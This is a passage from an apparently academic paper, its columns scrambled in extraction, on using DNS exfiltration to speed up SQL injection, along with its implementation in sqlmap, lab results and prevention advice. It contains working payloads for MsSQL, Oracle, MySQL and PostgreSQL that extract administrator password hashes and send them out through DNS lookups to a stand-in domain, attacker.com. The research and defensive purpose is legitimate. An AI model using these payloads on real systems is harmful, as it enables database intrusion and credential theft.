DECLARE @host varchar(1024); HTTPURITYPE returns the Character Large Object
(CLOB) retrieved from the given address8:
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash) HTTPURITYPE('<url>').GETCLOB()
FROM sys.sql_logins WHERE name='sa')
+'.attacker.com'; For example, to start content retrieval from a page
located at http://test.example.com/index.php run:
EXEC('master..xp_dirtree
"'+@host+'foobar$"'); SELECT
HTTPURITYPE('http://test.example.com/index.
This precalculation form is used because the extended php').GETCLOB() FROM DUAL;
stored procedures don't accept subqueries as given
parameter values. Hence the usage of temporary variable
for storing results of SQL query.
7
Oracle is only DBMS which doesn't need UNC file path formatting for
5
provoking DNS requests, making attacks usable on both Windows and
In comparison with master..xp_dirtree(), master..xp_subdirs() returns Linux back-end platforms
only those directories with depth 1 8
There are also other similar instance methods of class HTTPURITYPE
6
Other described MsSQL's extended stored procedures can be used that can be used for this paper's purpose (e.g. GETBLOB(),
exactly the same way GETCONTENTTYPE() and GETXML()) [14]
4. 4.2.4 DBMS_LDAP.INIT 4.4 PostgreSQL
Package DBMS_LDAP enables PL/SQL programmers
to access data from Lightweight Directory Access 4.4.1 COPY
Protocol (LDAP) servers. It's INIT() procedure is used to PostgreSQL's statement COPY copies data between a
initialize a session with the LDAP server: filesystem files and a table:
DBMS_LDAP.INIT(('<host>',<port>) COPY <table>(<column>,...) FROM '<path>'
For example, to initialize a connection with the host For example, to copy the content from a file located at
test.example.com run: C:WindowsTempusers.txt to a table named users
SELECT containing single column names run11:
DBMS_LDAP.INIT(('test.example.com',80) FROM COPY users(names) FROM
DUAL; 'C:WindowsTempusers.txt'
Attackers can use any of mentioned Oracle
subroutines to provoke DNS requests. However, starting 4.4.2 Example
with Oracle 11g, subroutines which could cause network What follows is the example where system
access are restricted, except the DBMS_LDAP.INIT() administrator's (postgres) password hash is being pushed
[15][16]. through DNS resolution mechanism by usage of a
PostgreSQL's statement COPY:
4.2.5 Example
DROP TABLE IF EXISTS table_output;
What follows is the example where system
CREATE TABLE table_output(content text);
administrator's (SYS) password hash is being pushed
through DNS resolution mechanism by usage of Oracle's CREATE OR REPLACE FUNCTION
procedure DBMS_LDAP.INIT()9: temp_function()
SELECT DBMS_LDAP.INIT((SELECT password RETURNS VOID AS $$
FROM SYS.USER$ WHERE DECLARE exec_cmd TEXT;
name='SYS')||'.attacker.com',80) FROM DUAL;
DECLARE query_result TEXT;
4.3 MySQL BEGIN
SELECT INTO query_result (SELECT passwd
4.3.1 LOAD_FILE FROM pg_shadow WHERE usename='postgres');
MySQL's function LOAD_FILE() reads the file exec_cmd := E'COPY table_output(content)
content and returns it as a string: FROM E''||query_result||
E'.attacker.comfoobar.txt'';
LOAD_FILE('<filepath>')
EXECUTE exec_cmd;
For example, to get the content of a file located at END;
C:Windowssystem.ini run10:
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT
LOAD_FILE('C:Windowssystem.ini'); SELECT temp_function();
This precalculation form is used because the SQL
4.3.2 Example statement COPY doesn't accept subqueries. Also, in
What follows is the example where system PostgreSQL variables have to be explicitly declared and
administrator's (root) password hash is being pushed used inside the subroutine scope (function or procedure).
through DNS resolution mechanism by usage of MySQL's Hence the usage of user-defined stored function.
function LOAD_FILE():
SELECT LOAD_FILE(CONCAT('',(SELECT 5 Implementation
password FROM mysql.user WHERE user='root' As mentioned, SQL injection tool sqlmap has been
LIMIT 1),'.attacker.comfoobar'));
chosen, mostly because author of this paper is also one of
9
it's developers, and upgraded to support DNS exfiltration.
Other described Oracle's procedures can be used exactly the same way New command line option --dns-domain has been added
if the execution rights haven't been revoked
10 11
Backslash character () has to be escaped as it has the special meaning Backslash character () has to be escaped as it has the special meaning
in MySQL in PostgreSQL
5. as a minimal requirement for the new program's their speed and lack of special requirements. Hence, only
workflow. With it user is able to turn on the DNS when slow inference techniques are available and option
exfiltration support and is informing sqlmap that the all --dns-domain has been explicitly set by the user, sqlmap
provoked DNS resolution requests should point toward will turn on the support for DNS exfiltration.
the given domain (e.g. --dns-domain=attacker.com).
Each resulting DNS resolution request is being
Domain's name server entry (e.g. ns1.attacker.com) encoded to a hexadecimal form to comply with RFC 1034
has to contain the IP address of a machine running the [17], a (de-facto) standard for DNS domain names. That
sqlmap instance. From there, sqlmap is being run as a way all eventual non-word characters are being preserved.
fake name server providing valid (but dummy) responses Also, hexadecimal representation of longer SQL query
for the provoked incoming DNS resolution requests. results is being split into parts. That has to be done as
Dummy resolution response is being served just to each node's label (e.g. .example.) inside a full domain
unblock the waiting web server instance, without caring name is limited to 63 characters in length.
for the results, as program is not processing the web page
content itself. 6 Experimental setup and results
For each item being dumped, sqlmap is sending a For experimental purposes three machines were
crafted SQLi DNS exfiltration vector inside a normal configured and used:
HTTP request, while in background serving and logging
all incoming DNS requests. As each malicious SQL query 1) Attacker (172.16.138.1) – physical machine with
result is being enclosed with unique and randomly chosen Ubuntu 12.04 LTS 64-bit OS running latest
prefix and suffix strings, it's not difficult to distinguish sqlmap v1.0-dev (r5100)12
which DNS resolution request comes from which SQLi 2) Web Server (172.16.138.129) – virtual machine
DNS exfiltration vector. Also, with those random with Windows XP 32-bit SP1 OS running a
enclosings any possible DNS caching mechanism is XAMPP 1.7.3 instance containing deliberately
cancelled, practically forcing required recursive DNS SQLi vulnerable MySQL/PHP web application
resolution.
3) DNS Server (172.16.138.130) – virtual machine
Support for DBMSes MsSQL, Oracle, MySQL and with CentOS 6.2 64-bit OS running a BIND
PostgreSQL has been fully implemented. But, as
mentioned earlier, only Oracle is able to support the For virtual environment VMware Workstation 8.0.2
attack on both Windows and Linux back-end platforms, has been used. All tests were conducted inside a local
as others require support for handling of Windows UNC virtual network (172.16.138.0/24). Attacker machine has
file format paths. been used to conduct attacks against the vulnerable Web
Server machine. DNS Server machine has been used to
During the sqlmap run, union and error-based handle DNS resolution requests for attacker.com domain
techniques have the highest priority, primary because of coming from Web Server machine and forward them to
Attacker machine as it's registered name server.
All sqlmap supported techniques were tested, together
with the newly implemented DNS exfiltration. Number
of HTTP requests and time spent were measured, where
the content of the system table information_schema.
COLLATIONS was being dumped (around 4KB in size).
Table 1. Speed comparison of SQLi techniques
Method # of requests Time (sec)
Boolean-based blind 29,212 214.04
Time-based (1 sec) 32,716 17,720.51
Error-based 777 9.02
Union (full/partial) 3/136 0.70/2.50
DNS exfiltration 1,409 35.31
Figure 2: DNS exfiltration in SQLi attack 12
DNS exfiltration support is officially available in sqlmap development
version (v1.0-dev) starting with r5086 [1]
6. 7 Discussion 8 Prevention tips
From results given in Table 1 it can be seen that the To avoid attacks described in this paper prevention of
inband techniques (union and error-based) were the SQLi flaws must have the highest priority. Usage of
fastest ones, while inference techniques (boolean-based prepared statements15 is considered to be the safest
blind and time-based) were the slowest. DNS exfiltration precaution [18]. Prepared statements ensure that attackers
was, as expected, slower than the slowest inband (error- are not able to change the intent of a query, even if other
based) while faster than the fastest inference technique SQL commands are being inserted [19].
(boolean-based blind). Time-based technique was clearly
Various sanitization mechanisms like magic_quotes()
too slow13.
and addslashes() can't completely prevent the presence or
In real life scenarios all techniques would inherently exploitation of a SQLi vulnerability, as certain techniques
experience additional delay per each request because of used in conjunction with environmental conditions could
connection latency and time needed for loading of normal allow attackers to exploit the vulnerability [20][21].
sized pages. In used SQLi vulnerable page a small table Instead, if prepared statements are not used, it's
has been returned making connection reads extremely recommended to use input validation with bad input being
fast. Also, in real life scenarios unwanted connection rejected, rather than escaped or modified [22].
latency would just introduce a need for a higher time-
Administrator should always be prepared for the
delay14 value in time-based technique making dumping
unauthorized access to the underlying database. Good
process even more slower for those kind of cases.
counter-measure is the restriction of all database access to
There is also a fact that in real life scenario DNS the least privilege. Thus, any given privilege should be
exfiltration technique would get an additional delay granted to the least amount of code necessary for the
introduced with usage of non-local network based DNS shortest duration of time that is required to get the job
servers. Nevertheless, difference between it and inference done [23]. Following that principle, users must be able to
techniques would stay at considerable ratio because later access only the information and resources that are
will need more time to retrieve the same data because of absolutely necessary.
inevitable higher number of requests.
As the last step, for successful mitigation of eventual
All in all, numbers for DNS exfiltration technique look DNS exfiltration attacks, administrator has to make sure
quite promising, making it a perfect alternative for that the execution of all unnecessary system subroutines is
inference methods. being constrained. If everything fails, attackers mustn't be
able to run those that could provoke DNS requests.
There has been some work in field of detecting
malicious activities in DNS traffic [25][26], but mostly
because of lack of practical and mainstream solutions,
those won't be specially mentioned here.
9 Conclusion
In this paper, it has been shown how attackers can use
DNS exfiltration technique to considerably speed up the
data retrieval when only relatively slow inference SQLi
techniques are usable. Also, number of required requests
toward vulnerable web server is drastically reduced
making it less noisy.
Due to a requirement for controlling of a domain's
name server, it probably won't be used by majority of
attackers. From implementation point of view everything
Figure 3: Traffic capture of sqlmap run with DNS exfiltration was straightforward, hence it's practical value is not to be
ignored. Implemented support inside a sqlmap should
make it publicly available to all for further research.
13
That's the primary reason why majority of attackers just skip cases
where that's the only usable technique
14 15
To properly distinguish delayed and regular response times Also referred to as parameterized queries
7. References http://docs.oracle.com/cd/B10501_01/appdev.
920/a96616.pdf
[1] sqlmap – automatic SQL injection and database [15] Hacking Oracle From Web Apps, Sumit Siddharth,
takeover tool, Bernardo Damele A. G., Miroslav Štampar, Aleksander Gorkowienko, 7Safe, DEF CON 18,
http://www.sqlmap.org/ November 2010,
[2] Exfiltration: How Hackers Get the Data Out, Jart https://www.defcon.org/images/defcon-18/dc-
Armin, May 2011, 18-presentations/Siddharth/DEFCON-18-
http://news.hostexploit.com/cybercrime- Siddharth-Hacking-Oracle-From-Web.pdf
news/4877-exfiltration-how-hackers-get-the- [16] Exploiting PL/SQL Injection With Only CREATE
data-out.html SESSION Privileges in Oracle 11g, David Litchfield, An
[3] Wireshark - network protocol analyzer, Wireshark NGSSoftware Insight Security Research Publication,
Foundation, October 2009,
https://www.wireshark.org/ http://www.databasesecurity.com/Exploi
[4] The Rootkit Arsenal: Escape and Evasion in the Dark tingPLSQLinOracle11g.pdf
Corners of the System, Bill Blunden, WordWare [17] RFC 1034: Domain Names – Concepts and
Publishing, Inc., 2009 Facilities, Paul Mockapetris, November 1987,
[5] DNS as a Covert Channel Within Protected Networks, https://www.ietf.org/rfc/rfc1034.txt
Seth Bromberger , National Electric Sector Cyber [18] SQL Injection Prevention Cheat Sheet, Open Web
Security Organization (NESCO), January 2001, Application Security Project, March 2012,
http://energy.gov/sites/prod/files/oeprod/D https://www.owasp.org/index.php/SQL_Injecti
ocumentsandMedia/DNS_Exfiltration_2011-01- on_Prevention_Cheat_Sheet
01_v1.1.pdf [19] Parametrized SQL statement, Rosetta Code, August
[6] Data-mining with SQL Injection and Inference, David 2011,
Litchfield, An NGSSoftware Insight Security Research http://rosettacode.org/wiki/Parametrized_SQ
Publication, September 2005, L_statement
http://www.nccgroup.com/Libraries/Document_ [20] SQL Injection Attacks and Defense, Justin Clarke,
Downloads/Data- Syngress, 2009
Mining_With_SQL_Injection_and_Inference.sfl
[21] addslashes() Versus mysql_real_escape_string(),
b.ashx
Chris Shiflett, January 2006,
[7] Advanced SQL Injection, Joseph McCray, February http://shiflett.org/blog/2006/jan/addslashe
2009, s-versus-mysql-real-escape-string
http://www.slideshare.net/joemccray/Advance
[22] Advanced SQL Injection, Victor Chapela, Sm4rt
dSQLInjectionv2
Security Services, OWASP, November 2005,
[8] SQL Injection and Data Mining through Inference, https://www.owasp.org/images/7/74/Advanced_
David Litchfield, BlackHat EU, 2005, SQL_Injection.ppt
https://www.blackhat.com/presentations/bh-
[23] Security Overview (ADO.NET), MSDN, Microsoft,
europe-05/bh-eu-05-litchfield.pdf
2012.,
[9] SQL – Injection & OOB – channels, Patrik Karlsson, http://msdn.microsoft.com/en-
DEF CON 15, August 2007, us/library/hdb58b2f.aspx
https://www.defcon.org/images/defcon-
[24] The Web Application Hacker's Handbook: Finding
15/dc15-presentations/dc-15-karlsson.pdf
and Exploiting Security Flaws, Dafydd Stuttard, Marcus
[10] The TCP/IP Guide: A Comprehensive, Illustrated
Pinto, John Wiley & Sons, 2011
Internet Protocols Reference, Charles M. Kozierok, No
[25] Detecting DNS Tunnels Using Character Frequency
Starch Press, 2005
Analysis, Kenton Born, Dr. David Gustafson, Kansas
[11] How DNS query works, Microsoft TechNet, January
State University, April 2010,
2005, http://arxiv.org/pdf/1004.4358.pdf
http://technet.microsoft.com/en-
us/library/cc775637(v=ws.10).aspx [26] Finding Malicious Activity in Bulk DNS Data, Ed
[12] Microsoft Windows 2000 DNS: Implementation and Stoner, Carnegie Mellon University, 2010,
www.cert.org/archive/pdf/research-rpt-
Administration, Kevin Kocis, Sams Publishing, 2001 2009/stoner-mal-act.pdf
[13] Useful undocumented extended stored procedures,
Alexander Chigrik, 2010,
http://www.mssqlcity.com/Articles/Undoc/Und
ocExtSP.htm
[14] Oracle9i XML API Reference - XDK and Oracle
XML DB (Release 2), Oracle Corporation, March 2002,